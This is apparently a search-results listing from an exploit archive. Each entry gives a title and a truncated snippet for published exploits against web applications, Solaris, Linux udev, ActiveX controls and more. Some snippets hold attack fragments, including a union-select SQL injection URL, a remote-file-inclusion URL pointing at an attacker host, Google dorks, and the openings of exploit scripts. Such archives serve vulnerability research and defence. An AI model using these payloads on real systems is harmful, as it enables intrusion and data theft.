56796 matches found
PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0-Day PunBB = 1.3. Package: PunPM = v1.2.6 Remote Blind SQL Injection Exploit Author/s: Dante90, WaRWolFz Crew Created: 2009.07.30 after 0 days the bug was discovered. Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero,...
CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13259/info CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script...
RarCrack 0.2 - "filename" init() .bss PoC
No description provided by source. The software can be downloaded here: http://rarcrack.sourceforge.net/ Author: stoke Date: 2010-09-20 Download: http://rarcrack.sourceforge.net/ Tested on: Backtrack 4 Site: http://devilcode.it | http://hack2web.altervista.org Special greetz to: nex, for reassure...
joomla Component com_pcchess Local File Inclusion
No description provided by source...
ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit
No description provided by source. ----------------------------Information------------------------------------------------ +Name :ilchClan = 1.0.5B SQL Injection Vulnerability Exploit +Author : Easy Laster +ICQ : 11-051-551 +email : [email protected] +Date : 15.04.2010 +Script : ilchClan = 1.0.5B...
DigitalHive Multiple Vulnerabilities
No description provided by source...
PMachine Pro 2.4 - Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12597/info PMachine Pro is reported prone to a remote file include vulnerability. This issue affects the 'mailautocheck.php' script. An attacker may leverage this issue to execute arbitrary server-side script code on an...
IBM Lotus Domino Web Access Upload Module Buffer Overflow
No description provided by source. $Id: ibmlotusdominodwauploadmodule.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensin...
Ananta Gazelle CMS - Update Statement SQL Injection
No description provided by source. Exploit Title: Ananta Gazelle CMS - Update Statement Sql injection Google Dork: - Date: 07-02-2012 Author: hackme Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/AnantaGazelle1.0.zip/ Version: 1.0 stable Tested on: backbox 2...
Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1986/info Resin is a servlet and JSP engine that supports java and javascript. ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent...
2daybiz Freelance Script SQL Injection Vulnerability Exploit
No description provided by source. ----------------------------Information------------------------------------------------ +Author : Easy Laster +ICQ : 11-051-551 +Info : http://www.2daybiz.com/freelancescript.html +Discovered by Easy Laster 4004-security-project.com +Security Group...
WordPress LeagueManager Plugin 3.8 - SQL Injection
No description provided by source. !/usr/bin/ruby Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection Google Dork: inurl:/wp-content/plugins/leaguemanager/ Date: 13/03/13 Exploit Author: Joshua Reynolds Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ Software Link...
Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8957/info A vulnerability has been reported in Web Wiz Forum that could allow unauthorized access to private forums. The problem occurs when handling malformed requests that make use of 'quote' mode. When this mode is use...
Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11612/info ScanMail for Domino is reported prone to a vulnerability that may allow sensitive configuration files to be disclosed to remote attackers. A successful attack may allow an attacker to disclose sensitive...
HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2245/info Certain versions of HP JetDirect enabled printers provide a function PJL command that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using thi...
simple web-server 1.2 - Directory Traversal
No description provided by source. Software: Simple web-server 1.2 Vulnerability: Directory Traversal Threat Level: Serious 3/5 Download: http://www.storecalc.com Discovery...
MidiCart PHP Search_List.PHP SearchString Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13516/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...
Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php
No description provided by source. ----------------------------Information------------------------------------------------ +Name : Preisschlacht Multi Liveshop System SQL Injection seite&aid index.php +Author : Easy Laster +Date : 17.03.2010 +Script : Preisschlacht Multi Liveshop System +Download ...
Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10746/info Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. If successful, the...
Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3)
No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...
Heaven Soft CMS 4.7 - SQL Injection Vulnerability
No description provided by source. x Type: SQL Injection Vulnerabilities x Vendor: http://www.newyorkindoorcricket.com/ x Script Name: Heaven Soft, CMS Version: 4.7 x author: PrinceofHacking x Team: Ashiyane Digital Security Team x Mail : PrincedotH4ck@gmaildotcom D0rk:photogalleryshow.php?id...
Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13510/info Oracle 9i/10g Database is prone to a logging failure vulnerability that exists in Fine Grained Audit FGA functionality. Reports indicate that FGA may be disabled inadvertently, without notifying the database...
Easy Online Shop SQL Injection Vulnerability
No description provided by source. ----------------------------Information------------------------------------------------ +Name : Easy Online Shop = SQL injection Vulnerability Proof of Concept +Author : Easy Laster +Date : 17.12.2010 +Script : Easy Online Shop +Vendor : http://www.mhproducts.de/...
mygamingladder MGL Combo System <= 7.5 - SQL Injection
No description provided by source. ----------------------------Information------------------------------------------------ +Name : mygamingladder MGL Combo System = 7.5 SQL injection Vulnerability & SQL injection Exploit +Author : Easy Laster +Date : 10.04.2010 +Script : mygamingladder MGL Combo...
BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability
No description provided by source. BtiTracker/xBtiTracker Remote SQL Injection Vulnerability Author: InATeam http://inattack.ru/ Affected versions: BtiTracker = 1.4.7, xBtiTracker = 2.0.542 Software site: http://www.btiteam.org/...
BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability
No description provided by source. BtiTracker =v1.4.1 Remote SQL Injection Exploit Discovered by: m@ge|ozz - [email protected] Vulnerability: Remote Sql Injection / Problem: Any user can be Administrator Website Vendor: http://www.btiteam.org Vulnerable Code accountchange.php: if isset$GETstyle...
I-RATER Platinum Common.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...
Boat Classifieds SQL Injection Vulnerability
No description provided by source. Boat Classifieds Category: Boat Classifieds SQL Injection Vulnerability Download: http://www.site2nite.com/boat-webdesign.asp Author: Sangteamtham at hcegroupdotnet Homepage: HCE group.net Exploit: http://server/detail.asp?ID=999999 union select...
PHP-Nuke <= 8.0 - Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0-Day PHP-Nuke = 8.0 News Remote SQL Injection Exploit Created: 2010.04.23 after 3 days the bug was discovered. Author/s: Dante90 & The:Paradox, WaRWolFz Crew Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shade...
Joomla Component simpledownload 0.9.5 - Local File Disclosure
No description provided by source. !==========================================! Joomla Component simpledownload Remote File Disclosure Author : altbta [email protected] Homepage : v4-team.com & xp10.me Date : 16 Mei, 2010 !==========================================! Software Information + Vendor :...
DevelopItEasy Events Calendar 1.2 - Multiple SQL Injection Vulnerabilities
No description provided by source...
Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
No description provided by source. $Id: integardpasswordbof.rb 11344 2010-12-15 19:49:40Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and term...
MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry BOF
No description provided by source. html object classid='clsid:3A86F1F2-4921-4C75-AF2C-A1AA241E12BA' id='target'/object script language='vbscript' 'Magneto Software ICMP ActiveX Control Buffer Overflow 'Discovered by: s4squatch 'website: www.securestate.com 'Date Discovered: 03/11/09 'Exploit...
Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit
No description provided by source. !/bin/bash Gazelle CMS 1.0 Multiple Vulnerabilities Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download Found by whitesheep on 11/08/2009 Contact: [email protected] - https://www.ihteam.net Need magicquotegpc Off for RCE and LFI...
XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
No description provided by source. html head titleXOOPS Module WF-Snippets = 1.02 c BLIND SQL Injection Exploit/title script type=text/javascript //'=============================================================================================== //'Script Name: XOOPS Module WF-Snippets = 1.02 c...
PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the...
PHP Uploader Downloader 2.0 - Upload Shell Vulnerability
No description provided by source. ======================================================================================== | Title : PHP Uploader Downloader Upload Shell Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi -...
w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qwPOST; use Getopt::Long; Security Research...
PHPope <= 1.0.0 - Multiple Remote File Inclusion Vulnerabilities
No description provided by source. x PHPope = 1.0.0 Multiple Remote File Include Vulnerability ! Download Script : http://sourceforge.net/projects/phpope/files/ ! Author : cr4wl3r ! Contact : cr4wl3r4tlinuxmaildotorg ! Location : Gorontalo - INDONESIA ! Dork : FuCk y0u MaLaYsia x 3xplo!t :...
RoundCube Webmail Multiple Vulnerabilities
No description provided by source. Exploit Title: RoundCube Webmail XSS Vulnerability Date: 6.01.2010 Author: j4ck & Globus from elitehackers.pl Software Link: Software link : http://roundcube.net/download Version: 0.2.X , | possible vulnerability in higher versions. Tested on: Code : XSS:...
Sun Java Web Start Plugin Command Line Argument Injection (2012)
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
GTX CMS 2013 Optima - SQL Injection
No description provided by source. Document Title: GTX CMS 2013 Optima - Multiple Web Vulnerabilities References Source: http://www.vulnerability-lab.com/getcontent.php?id=1124 Release Date: 2013-10-29 Vulnerability Laboratory ID VL-ID:...
GameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS
No description provided by source. source: http://www.securityfocus.com/bid/1128/info Sending malformed packets to port 7070 will cause Real Server to stop responding. Restarting the server will be required in order to re-establish normal functionality. http://www.exploit-db.com/sploits/19856-1.e...
Wolf CMS 0.7.5 - Multiple Vulnerabilities
No description provided by source. Title: Wolf CMS v0.7.5 - Multiple Web Vulnerabilities Date: 2012-02-27 References: http://www.vulnerability-lab.com/getcontent.php?id=452 VL-ID: 452 Introduction: Wolf CMS is a content management system and is Free...
phpInstantGallery 2.0 - index.php gallery Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/29152/info phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in t...
MTCMS <= 2.0 (admin/admin_settings.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl +------------------------------------------------------------------------------------------- + MTCMS = 2.0 admin/adminsettings.php Remote File Include Exploit...
ablespace 1.0 (xss/bsql) Multiple Vulnerabilities
No description provided by source. Original advisory: http://dsecrg.com/pages/vul/show.php?id=137 Digital Security Research Group DSecRG Advisory DSECRG-09-037 Application: AbleSpace Versions Affected: 1.0 Vendor URL: http://abk-soft.com/ Bugs: Multiple Blind SQL Injections, Multiple XSS Exploits:...
Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit
No description provided by source. / cve-2009-1185.c udev 141 Local Privilege Escalation Exploit Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 udev before 1.4.1 does not verify whether a NETLINK message originates...
dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
No description provided by source. Credits : h4ntu Title : dotProject = 2.0.3 Remote File Inclusion URL : http://www.dotproject.net/ Exploit : http://target.com/dotProjectpath/includes/dbadodb.php?baseDir=attacker milw0rm.com 2006-06-20...